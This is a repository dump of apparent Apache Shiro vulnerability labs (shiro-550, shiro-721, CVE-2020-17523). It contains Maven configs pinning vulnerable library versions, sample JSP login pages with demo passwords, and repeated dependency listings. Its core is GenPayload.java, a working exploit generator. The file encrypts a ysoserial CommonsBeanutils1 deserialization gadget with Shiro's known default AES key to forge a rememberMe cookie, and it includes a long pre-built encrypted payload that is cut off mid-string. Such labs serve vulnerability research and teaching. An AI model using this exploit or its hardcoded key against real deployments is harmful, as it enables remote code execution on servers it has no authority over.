spring-boot-starter-tomcat 30 | 31 | 32 | 33 | 34 | 35 | 36 | javax.servlet 37 | javax.servlet-api 38 | 4.0.1 39 | provided 40 | 41 | 42 | 43 | org.apache.shiro 44 | shiro-web 45 | 1.5.3 46 | 47 | 48 | org.apache.shiro 49 | shiro-spring 50 | 1.5.3 51 | 52 | 53 | 54 | org.springframework.boot 55 | spring-boot-starter-test 56 | test 57 | 58 | 59 | org.junit.vintage 60 | junit-vintage-engine 61 | 62 | 63 | 64 | 65 | org.springframework.boot 66 | spring-boot-starter-web 67 | 68 | 69 | 70 | 71 | 72 | 73 | org.springframework.boot 74 | spring-boot-maven-plugin 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/home.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | Apache Shiro Quickstart 25 | 26 | 27 | 28 |

Apache Shiro Quickstart

29 | 30 |

Hi Guest! 31 | ( " onclick="document.getElementById('logout_form').submit();return false;">logout 32 | ">Log in (sample accounts provided) ) 33 |

34 | 35 |

Welcome to the Apache Shiro Quickstart sample application. 36 | This page represents the home page of any web application.

37 | 38 |

Visit your ">account page.

 39 |

If you want to access the user-only ">account page, 40 | you will need to log-in first.

 41 | 42 |

Roles

43 | 44 |

To show some taglibs, here are the roles you have and don't have. Log out and log back in under different user 45 | accounts to see different roles.

46 | 47 |

Roles you have

48 | 49 |

50 | admin
 51 | president
 52 | darklord
 53 | goodguy
 54 | schwartz
 55 |

56 | 57 |

Roles you DON'T have

58 | 59 |

60 | admin
 61 | president
 62 | darklord
 63 | goodguy
 64 | schwartz
 65 |

66 | 67 |
" method="post">
68 | 69 | 70 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/login.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

Please Log in

28 | 29 | 30 |

Here are a few sample accounts to play with in the default text-based Realm (used for this 31 | demo and test installs only). Do you remember the movie these names came from? ;)

32 | 33 | 34 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 |
UsernamePassword
rootsecret
presidentskroob12345
darkhelmetludicrousspeed
lonestarrvespa
87 |

88 | 89 | 90 |
91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 |
Username:
Password:
Remember Me
107 |
108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/login.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

Please Log in

28 | 29 | 30 |

Here are a few sample accounts to play with in the default text-based Realm (used for this 31 | demo and test installs only). Do you remember the movie these names came from? ;)

32 | 33 | 34 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 |
UsernamePassword
rootsecret
presidentskroob12345
darkhelmetludicrousspeed
lonestarrvespa
87 |

88 | 89 | 90 |
91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 |
Username:
Password:
Remember Me
107 |
108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /shiro-721/target/classes/META-INF/DEPENDENCIES: -------------------------------------------------------------------------------- 1 | // ------------------------------------------------------------------ 2 | // Transitive dependencies of this project determined from the 3 | // maven pom organized by organization. 4 | // ------------------------------------------------------------------ 5 | 6 | Apache Shiro :: Samples :: Web 7 | 8 | 9 | From: 'an unknown organization' 10 | - jstl javax.servlet:jstl:jar:1.2 11 | 12 | 13 | From: 'Apache Software Foundation' (http://www.apache.org) 14 | - Apache Log4j (http://logging.apache.org/log4j/1.2/) log4j:log4j:bundle:1.2.17 15 | License: The Apache Software License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 16 | 17 | From: 'QOS.ch' (http://www.qos.ch) 18 | - JCL 1.1.1 implemented over SLF4J (http://www.slf4j.org) org.slf4j:jcl-over-slf4j:jar:1.7.21 19 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 20 | - SLF4J API Module (http://www.slf4j.org) org.slf4j:slf4j-api:jar:1.7.21 21 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 22 | - SLF4J LOG4J-12 Binding (http://www.slf4j.org) org.slf4j:slf4j-log4j12:jar:1.7.21 23 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 24 | 25 | From: 'The Apache Software Foundation' (http://www.apache.org/) 26 | - Apache Commons Collections (http://commons.apache.org/collections/) commons-collections:commons-collections:jar:3.2.2 27 | License: Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 28 | 29 | From: 'The Apache Software Foundation' (https://www.apache.org/) 30 | - Apache Commons BeanUtils (https://commons.apache.org/proper/commons-beanutils/) commons-beanutils:commons-beanutils:jar:1.9.3 31 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 32 | - Apache Shiro :: Cache (http://shiro.apache.org/shiro-cache/) org.apache.shiro:shiro-cache:bundle:1.4.1 33 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 34 | - Apache Shiro :: Configuration :: Core (http://shiro.apache.org/shiro-config/shiro-config-core/) org.apache.shiro:shiro-config-core:bundle:1.4.1 35 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 36 | - Apache Shiro :: Configuration :: OGDL (http://shiro.apache.org/shiro-config/shiro-config-ogdl/) org.apache.shiro:shiro-config-ogdl:bundle:1.4.1 37 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 38 | - Apache Shiro :: Core (http://shiro.apache.org/shiro-core/) org.apache.shiro:shiro-core:bundle:1.4.1 39 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 40 | - Apache Shiro :: Cryptography :: Ciphers (http://shiro.apache.org/shiro-crypto/shiro-crypto-cipher/) org.apache.shiro:shiro-crypto-cipher:bundle:1.4.1 41 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 42 | - Apache Shiro :: Cryptography :: Core (http://shiro.apache.org/shiro-crypto/shiro-crypto-core/) org.apache.shiro:shiro-crypto-core:bundle:1.4.1 43 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 44 | - Apache Shiro :: Cryptography :: Hashing (http://shiro.apache.org/shiro-crypto/shiro-crypto-hash/) org.apache.shiro:shiro-crypto-hash:bundle:1.4.1 45 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 46 | - Apache Shiro :: Event (http://shiro.apache.org/shiro-event/) org.apache.shiro:shiro-event:bundle:1.4.1 47 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 48 | - Apache Shiro :: Lang (http://shiro.apache.org/shiro-lang/) org.apache.shiro:shiro-lang:bundle:1.4.1 49 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 50 | - Apache Shiro :: Web (http://shiro.apache.org/shiro-web/) org.apache.shiro:shiro-web:bundle:1.4.1 51 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /shiro-721/target/test-classes/META-INF/DEPENDENCIES: -------------------------------------------------------------------------------- 1 | // ------------------------------------------------------------------ 2 | // Transitive dependencies of this project determined from the 3 | // maven pom organized by organization. 4 | // ------------------------------------------------------------------ 5 | 6 | Apache Shiro :: Samples :: Web 7 | 8 | 9 | From: 'an unknown organization' 10 | - jstl javax.servlet:jstl:jar:1.2 11 | 12 | 13 | From: 'Apache Software Foundation' (http://www.apache.org) 14 | - Apache Log4j (http://logging.apache.org/log4j/1.2/) log4j:log4j:bundle:1.2.17 15 | License: The Apache Software License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 16 | 17 | From: 'QOS.ch' (http://www.qos.ch) 18 | - JCL 1.1.1 implemented over SLF4J (http://www.slf4j.org) org.slf4j:jcl-over-slf4j:jar:1.7.21 19 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 20 | - SLF4J API Module (http://www.slf4j.org) org.slf4j:slf4j-api:jar:1.7.21 21 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 22 | - SLF4J LOG4J-12 Binding (http://www.slf4j.org) org.slf4j:slf4j-log4j12:jar:1.7.21 23 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 24 | 25 | From: 'The Apache Software Foundation' (http://www.apache.org/) 26 | - Apache Commons Collections (http://commons.apache.org/collections/) commons-collections:commons-collections:jar:3.2.2 27 | License: Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 28 | 29 | From: 'The Apache Software Foundation' (https://www.apache.org/) 30 | - Apache Commons BeanUtils (https://commons.apache.org/proper/commons-beanutils/) commons-beanutils:commons-beanutils:jar:1.9.3 31 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 32 | - Apache Shiro :: Cache (http://shiro.apache.org/shiro-cache/) org.apache.shiro:shiro-cache:bundle:1.4.1 33 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 34 | - Apache Shiro :: Configuration :: Core (http://shiro.apache.org/shiro-config/shiro-config-core/) org.apache.shiro:shiro-config-core:bundle:1.4.1 35 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 36 | - Apache Shiro :: Configuration :: OGDL (http://shiro.apache.org/shiro-config/shiro-config-ogdl/) org.apache.shiro:shiro-config-ogdl:bundle:1.4.1 37 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 38 | - Apache Shiro :: Core (http://shiro.apache.org/shiro-core/) org.apache.shiro:shiro-core:bundle:1.4.1 39 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 40 | - Apache Shiro :: Cryptography :: Ciphers (http://shiro.apache.org/shiro-crypto/shiro-crypto-cipher/) org.apache.shiro:shiro-crypto-cipher:bundle:1.4.1 41 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 42 | - Apache Shiro :: Cryptography :: Core (http://shiro.apache.org/shiro-crypto/shiro-crypto-core/) org.apache.shiro:shiro-crypto-core:bundle:1.4.1 43 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 44 | - Apache Shiro :: Cryptography :: Hashing (http://shiro.apache.org/shiro-crypto/shiro-crypto-hash/) org.apache.shiro:shiro-crypto-hash:bundle:1.4.1 45 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 46 | - Apache Shiro :: Event (http://shiro.apache.org/shiro-event/) org.apache.shiro:shiro-event:bundle:1.4.1 47 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 48 | - Apache Shiro :: Lang (http://shiro.apache.org/shiro-lang/) org.apache.shiro:shiro-lang:bundle:1.4.1 49 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 50 | - Apache Shiro :: Web (http://shiro.apache.org/shiro-web/) org.apache.shiro:shiro-web:bundle:1.4.1 51 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /shiro-721/target/maven-shared-archive-resources/META-INF/DEPENDENCIES: -------------------------------------------------------------------------------- 1 | // ------------------------------------------------------------------ 2 | // Transitive dependencies of this project determined from the 3 | // maven pom organized by organization. 4 | // ------------------------------------------------------------------ 5 | 6 | Apache Shiro :: Samples :: Web 7 | 8 | 9 | From: 'an unknown organization' 10 | - jstl javax.servlet:jstl:jar:1.2 11 | 12 | 13 | From: 'Apache Software Foundation' (http://www.apache.org) 14 | - Apache Log4j (http://logging.apache.org/log4j/1.2/) log4j:log4j:bundle:1.2.17 15 | License: The Apache Software License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 16 | 17 | From: 'QOS.ch' (http://www.qos.ch) 18 | - JCL 1.1.1 implemented over SLF4J (http://www.slf4j.org) org.slf4j:jcl-over-slf4j:jar:1.7.21 19 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 20 | - SLF4J API Module (http://www.slf4j.org) org.slf4j:slf4j-api:jar:1.7.21 21 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 22 | - SLF4J LOG4J-12 Binding (http://www.slf4j.org) org.slf4j:slf4j-log4j12:jar:1.7.21 23 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 24 | 25 | From: 'The Apache Software Foundation' (http://www.apache.org/) 26 | - Apache Commons Collections (http://commons.apache.org/collections/) commons-collections:commons-collections:jar:3.2.2 27 | License: Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 28 | 29 | From: 'The Apache Software Foundation' (https://www.apache.org/) 30 | - Apache Commons BeanUtils (https://commons.apache.org/proper/commons-beanutils/) commons-beanutils:commons-beanutils:jar:1.9.3 31 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 32 | - Apache Shiro :: Cache (http://shiro.apache.org/shiro-cache/) org.apache.shiro:shiro-cache:bundle:1.4.1 33 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 34 | - Apache Shiro :: Configuration :: Core (http://shiro.apache.org/shiro-config/shiro-config-core/) org.apache.shiro:shiro-config-core:bundle:1.4.1 35 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 36 | - Apache Shiro :: Configuration :: OGDL (http://shiro.apache.org/shiro-config/shiro-config-ogdl/) org.apache.shiro:shiro-config-ogdl:bundle:1.4.1 37 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 38 | - Apache Shiro :: Core (http://shiro.apache.org/shiro-core/) org.apache.shiro:shiro-core:bundle:1.4.1 39 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 40 | - Apache Shiro :: Cryptography :: Ciphers (http://shiro.apache.org/shiro-crypto/shiro-crypto-cipher/) org.apache.shiro:shiro-crypto-cipher:bundle:1.4.1 41 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 42 | - Apache Shiro :: Cryptography :: Core (http://shiro.apache.org/shiro-crypto/shiro-crypto-core/) org.apache.shiro:shiro-crypto-core:bundle:1.4.1 43 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 44 | - Apache Shiro :: Cryptography :: Hashing (http://shiro.apache.org/shiro-crypto/shiro-crypto-hash/) org.apache.shiro:shiro-crypto-hash:bundle:1.4.1 45 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 46 | - Apache Shiro :: Event (http://shiro.apache.org/shiro-event/) org.apache.shiro:shiro-event:bundle:1.4.1 47 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 48 | - Apache Shiro :: Lang (http://shiro.apache.org/shiro-lang/) org.apache.shiro:shiro-lang:bundle:1.4.1 49 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 50 | - Apache Shiro :: Web (http://shiro.apache.org/shiro-web/) org.apache.shiro:shiro-web:bundle:1.4.1 51 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/classes/META-INF/DEPENDENCIES: -------------------------------------------------------------------------------- 1 | // ------------------------------------------------------------------ 2 | // Transitive dependencies of this project determined from the 3 | // maven pom organized by organization. 4 | // ------------------------------------------------------------------ 5 | 6 | Apache Shiro :: Samples :: Web 7 | 8 | 9 | From: 'an unknown organization' 10 | - jstl javax.servlet:jstl:jar:1.2 11 | 12 | 13 | From: 'Apache Software Foundation' (http://www.apache.org) 14 | - Apache Log4j (http://logging.apache.org/log4j/1.2/) log4j:log4j:bundle:1.2.17 15 | License: The Apache Software License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 16 | 17 | From: 'QOS.ch' (http://www.qos.ch) 18 | - JCL 1.1.1 implemented over SLF4J (http://www.slf4j.org) org.slf4j:jcl-over-slf4j:jar:1.7.21 19 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 20 | - SLF4J API Module (http://www.slf4j.org) org.slf4j:slf4j-api:jar:1.7.21 21 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 22 | - SLF4J LOG4J-12 Binding (http://www.slf4j.org) org.slf4j:slf4j-log4j12:jar:1.7.21 23 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 24 | 25 | From: 'The Apache Software Foundation' (http://www.apache.org/) 26 | - Apache Commons Collections (http://commons.apache.org/collections/) commons-collections:commons-collections:jar:3.2.2 27 | License: Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 28 | 29 | From: 'The Apache Software Foundation' (https://www.apache.org/) 30 | - Apache Commons BeanUtils (https://commons.apache.org/proper/commons-beanutils/) commons-beanutils:commons-beanutils:jar:1.9.3 31 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 32 | - Apache Shiro :: Cache (http://shiro.apache.org/shiro-cache/) org.apache.shiro:shiro-cache:bundle:1.4.1 33 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 34 | - Apache Shiro :: Configuration :: Core (http://shiro.apache.org/shiro-config/shiro-config-core/) org.apache.shiro:shiro-config-core:bundle:1.4.1 35 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 36 | - Apache Shiro :: Configuration :: OGDL (http://shiro.apache.org/shiro-config/shiro-config-ogdl/) org.apache.shiro:shiro-config-ogdl:bundle:1.4.1 37 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 38 | - Apache Shiro :: Core (http://shiro.apache.org/shiro-core/) org.apache.shiro:shiro-core:bundle:1.4.1 39 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 40 | - Apache Shiro :: Cryptography :: Ciphers (http://shiro.apache.org/shiro-crypto/shiro-crypto-cipher/) org.apache.shiro:shiro-crypto-cipher:bundle:1.4.1 41 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 42 | - Apache Shiro :: Cryptography :: Core (http://shiro.apache.org/shiro-crypto/shiro-crypto-core/) org.apache.shiro:shiro-crypto-core:bundle:1.4.1 43 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 44 | - Apache Shiro :: Cryptography :: Hashing (http://shiro.apache.org/shiro-crypto/shiro-crypto-hash/) org.apache.shiro:shiro-crypto-hash:bundle:1.4.1 45 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 46 | - Apache Shiro :: Event (http://shiro.apache.org/shiro-event/) org.apache.shiro:shiro-event:bundle:1.4.1 47 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 48 | - Apache Shiro :: Lang (http://shiro.apache.org/shiro-lang/) org.apache.shiro:shiro-lang:bundle:1.4.1 49 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 50 | - Apache Shiro :: Web (http://shiro.apache.org/shiro-web/) org.apache.shiro:shiro-web:bundle:1.4.1 51 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /shiro-550/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | com.example 6 | shiro-550 7 | 0.0.1-SNAPSHOT 8 | shiro-550 9 | Demo project for Spring Boot 10 | 11 | 12 | 1.8 13 | UTF-8 14 | UTF-8 15 | 2.3.7.RELEASE 16 | 17 | 18 | 19 | 20 | org.springframework.boot 21 | spring-boot-starter-web 22 | 23 | 24 | org.springframework.boot 25 | spring-boot-starter-thymeleaf 26 | 27 | 28 | org.apache.shiro 29 | shiro-core 30 | 1.2.4 31 | 32 | 33 | org.apache.shiro 34 | shiro-spring 35 | 1.2.4 36 | 37 | 38 | 39 | commons-beanutils 40 | commons-beanutils 41 | 1.9.2 42 | 43 | 44 | 45 | org.springframework.boot 46 | spring-boot-starter-test 47 | test 48 | 49 | 50 | org.junit.vintage 51 | junit-vintage-engine 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | org.springframework.boot 61 | spring-boot-dependencies 62 | ${spring-boot.version} 63 | pom 64 | import 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | org.apache.maven.plugins 73 | maven-compiler-plugin 74 | 3.8.1 75 | 76 | 1.8 77 | 1.8 78 | UTF-8 79 | 80 | 81 | 82 | org.springframework.boot 83 | spring-boot-maven-plugin 84 | 2.3.7.RELEASE 85 | 86 | com.example.shiro550.Shiro550Application 87 | 88 | 89 | 90 | repackage 91 | 92 | repackage 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.6.RELEASE 9 | 10 | 11 | org.syclover 12 | srpingboot-shiro 13 | 0.0.1-SNAPSHOT 14 | srpingboot-shiro 15 | Demo project for Spring Boot 16 | war 17 | 18 | 19 | 1.8 20 | 21 | 22 | 23 | 24 | org.springframework.boot 25 | spring-boot-starter-web 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | javax.servlet 37 | javax.servlet-api 38 | 4.0.1 39 | provided 40 | 41 | 42 | 43 | org.apache.shiro 44 | shiro-web 45 | 1.7.0 46 | 47 | 48 | org.apache.shiro 49 | shiro-core 50 | 1.7.0 51 | 52 | 53 | org.apache.shiro 54 | shiro-spring 55 | 1.7.0 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | org.apache.commons 72 | commons-collections4 73 | 4.0 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | org.springframework.boot 84 | spring-boot-starter-test 85 | test 86 | 87 | 88 | org.junit.vintage 89 | junit-vintage-engine 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | org.springframework.boot 99 | spring-boot-maven-plugin 100 | 101 | 102 | 103 | -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/exp/GenPayload.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550.exp; 2 | 3 | import org.apache.shiro.crypto.AesCipherService; 4 | import org.apache.shiro.codec.CodecSupport; 5 | import org.apache.shiro.util.ByteSource; 6 | import org.apache.shiro.codec.Base64; 7 | import org.apache.shiro.io.DefaultSerializer; 8 | 9 | import java.nio.file.FileSystems; 10 | import java.nio.file.Files; 11 | import java.nio.file.Paths; 12 | 13 | public class GenPayload { 14 | public static void main(String[] args) throws Exception { 15 | byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("D:\\EXP\\poc.ser")); //java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "calc.exe" > poc.ser 16 | 17 | AesCipherService aes = new AesCipherService(); 18 | byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA==")); 19 | 20 | ByteSource ciphertext = aes.encrypt(payloads, key); 21 | System.out.printf(ciphertext.toString()); 22 | //gnyKHRqlL607wxMRTXgh7AAsHuUx6PD8f+5JtkJIw4z/OsVFJ7qfZdzQgPM4P1zbV20paKNR0+wXHnrVLPQgRle3npgcsMO0npXGmvUwrpCCybxZ+stPX03Fpb66a6ka3YUXPNZ4LYi3fMAtMX/ByiO/zvJp+seY1XDjNCiqDDCjUngAd2s9I189ebL6GT1o9CVGsAznUnENBP11WxDYeeTrmJXPwA3/Ybxfu1LZwL/VKSfTRyVYHHizoncr9yFWdwNYO+FMbnWMGXCbqxvzhrDRTaP1aIRoFCFuposVs4NuK+wawip4+5RCL8/tf05E0KkzPC22QIfXQzoKJg7kbBVpqbsofUzwJW7sPBYiIjKHFN0NaPzBCSHt0Gm7yTSOCGby2UtSx+eAW7r26ySBeFm97Uh/M1ocgcNgLNCUBp5AG36f0DGB9+6pKuyJBLwA0q1h6YYYxJlHmPXKAKYakC+5eKqfVluW+4eVJifaoLQ1J9TQ86SeVvehWN9HHaIW7hV2ERotWfmq5AldT9vpBQbBWC04e99Hm9EzdtNeqooGQO+XNih9Mxcs4MV9npEtlwbQ96BJMjou52FdM/PErGjudf8FTctT4D6uAANNBjb1psw16NwVCRG/9zcV9/GX2BpTm8JSAUq35PB7XIbqH7JhLEPEA0eZKf8wJqjtvjxCL3IAmIIwz6gl1mqoUtrxadjygkL7h/PfpyKc0Fjpv7CmVxtdmhmKEiqZb95ximlbOrmQh/j8YR1ZAHeVUMBskvgE8WVm2VRFYR7CtSSjUGFj5Kx7/PI8pefN1AKvre+C3uJs12uTjI7n3EyXRC2UjKchfPxTZ+hAPfg7/NeRi4PgUpSlimNiPnsvkCZ4VUfMcWdok9eNutYVc9nh8H8IEmntuENqTernWdki/Aoo95/p1lDRC6VMIqGxNgXaU4KhTSkEdCYfCCvg5lWiAs1/DxVDw2bG4hQTxAnhbeucRzAIggYyCWQxB1UVYVe9Llz0CZuHC2oFTMCccYfKjIDOzdtyJYk3I2coGgSfSU7DiTQRu0h2Vs4lb8nNp425rDvJhvPrSSNiHyUqiV2NrR9DDKXsyv+PTCagxzezQr/Fe0vuD/+avX/WkyLAK6HCO9rKZQESIlrGt06eolCogQDJSzqbOWufnM7qvvIURzeW82smZyGHwpLKrQodaMdgCtWCZnd0Pqz/kx3Zze83WqCKv1kzz+VtlgegaY4sfThbnhHpPIiw8Vak2WYb7MgbpN9NjsmbWORAu4bs0QcvueRC0yDbufONphMM/0ZBqnQH8p7kbE3GtCVcZjGVq2f+xMBO1dUjJ5TjuANX2zfwn0sGJborMQoNpSDMcT4S32D/yXPm4k/lvXXEzxaKV0kktiSLNODm7un4uxjqFH8v0ItkPKvXq+Wydokb2Ik9igYKD6/5MOnIUuZcfShbmYu7Ocho02tEqNGTdJ846QKUhErd4TT2B4Nm5Y07SY/aCNor4xapLinDN2lpsmvlmk6fwW3xCUduzUxX0K8LKwhjknGrlgXVPpAbI2Nk4pXN8uePMmj9gp3gKo6FdFlw7fhNoKariJTMbnq4l6oPfLCaryc9IZ7YQTnukFPdh0gq9f+pfC/04LghoHJEk4RloibjoYrNeW7wwadr9mB7e34NKvEMvGaXyVfO8CIpm7cDQWbFoG1NvaC+qOQsk+yJNZR5req4UfWBIBQy/RKw8qT6IpqmqyTwHuviqNvJcRDBp/KeRbeUGA/9qt56fdpHokZNKnE3+mdexd0+rhym7/yx1rlWO/TLLmiQM+ETddC